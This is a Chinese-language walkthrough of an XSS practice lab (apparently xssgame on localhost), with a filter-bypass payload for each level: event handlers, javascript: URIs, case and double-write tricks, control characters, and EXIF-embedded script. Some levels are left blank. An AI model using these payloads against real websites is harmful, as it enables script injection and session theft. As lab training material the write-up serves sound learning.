第一关:

没有过滤,直接构造payload过关:

http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/script%3E

第二关:

输入之后观察页面源代码可以看到<>被转义

Payload:?keyword=test"><script>alert(111)</script>

第三关:

输入之后查看源代码发现输出位置都被转义:

然后通过'和//闭合,用' onclick=javascript:alert(1)//

第四关

闭合方式不同:

"onclick=javascript:alert(1)//

第五关:

使用onclick和script标签会被加上_过滤

使用a标签payload:"><a href="javascript:alert('a')">1</a >//

第六关:

Herf也被加上了_转义

可以大小写绕过"><a HRef="javascript:alert('a')">1</a >//

第七关:

被过滤:

双写绕过:

"><scriscriptpt>alert(111)</scscriptript>//

第八关:

发现有两处输出位置,第二处输出在了 a 标签 href 属性中,此处构造 payload,需要考 虑在 a 标签内,并绕过敏感字符。因为关键字符被做了替换,包括 script\herf\src\on\等, 大小写也不行。

这里尝试构造特殊的字符处理,就是在关键词中添加特殊的制表符,例如%0A,%09

注意是在url中,在浏览器中输入会进行编码

第九关

这一关多了对链接是否加http://的检查

Payload:javasc%0aript:alert(1)//http://aaa.com

第十关:

有隐藏的表单

也可以通过抓包修改页面源代码

第十一关:

方法相同

第十二关:

第十三关:

第十四关:
利用exiftool改变图片的exif信息

上传一个含有xss代码的图片触发xss

在读取的时候就会导致 XSS

第十五关:

level15.php?src='level1.php'level1.php?name=test<img src=1 onerror=alert(1)>'

第十六关:

?keyword=test<img%0Dsrc="1"%0Donerror=alert(1)>


第十七关:

第十八关:

第十九关:

第二十关:

最新文章

  1. flex的兼容
  2. 如何用Perl截取报文
  3. Struts2基础学习总结
  4. 扒一扒JavaScript 预解释
  5. Java 父类和子类
  6. nodejs save遇到的一个坑
  7. EXPORT_SYMBOL的作用是什么
  8. java IO复习(三)
  9. String类扩展
  10. 《算法导论》读书笔记之图论算法—Dijkstra 算法求最短路径
  11. LeetCode OJ 337. House Robber III
  12. 一小时学会ECMAScript6新特性
  13. Dynamic Web Module 3.0 requires Java 1.6 or newer.的解决
  14. Android Demo---如何敲出圆角的Button+圆角头像
  15. Spark SQL历险记
  16. JVM和GC垃圾回收机制和内存分配
  17. 永久有效的 webstorm license server 20180808
  18. C++复习:STL之算法
  19. JOffice中的权限管理--功能粒度的权限管理配置
  20. 数据库sharding系列好文收藏

热门文章

  1. springboot项目启动,停止,重启
  2. mysql 更换主键
  3. Python+unittest+excel
  4. 【spring源码系列】之【Bean的初始化】
  5. PYTHON找色不变移动
  6. 前端早读课:JavaScript函数的6个基本术语
  7. Appium和Python实现蚂蚁森林自动化收取能量
  8. SpringBoot+ELK日志系统搭建
  9. g6中的变换矩阵matrix
  10. centos 7 网络静态IP配置文件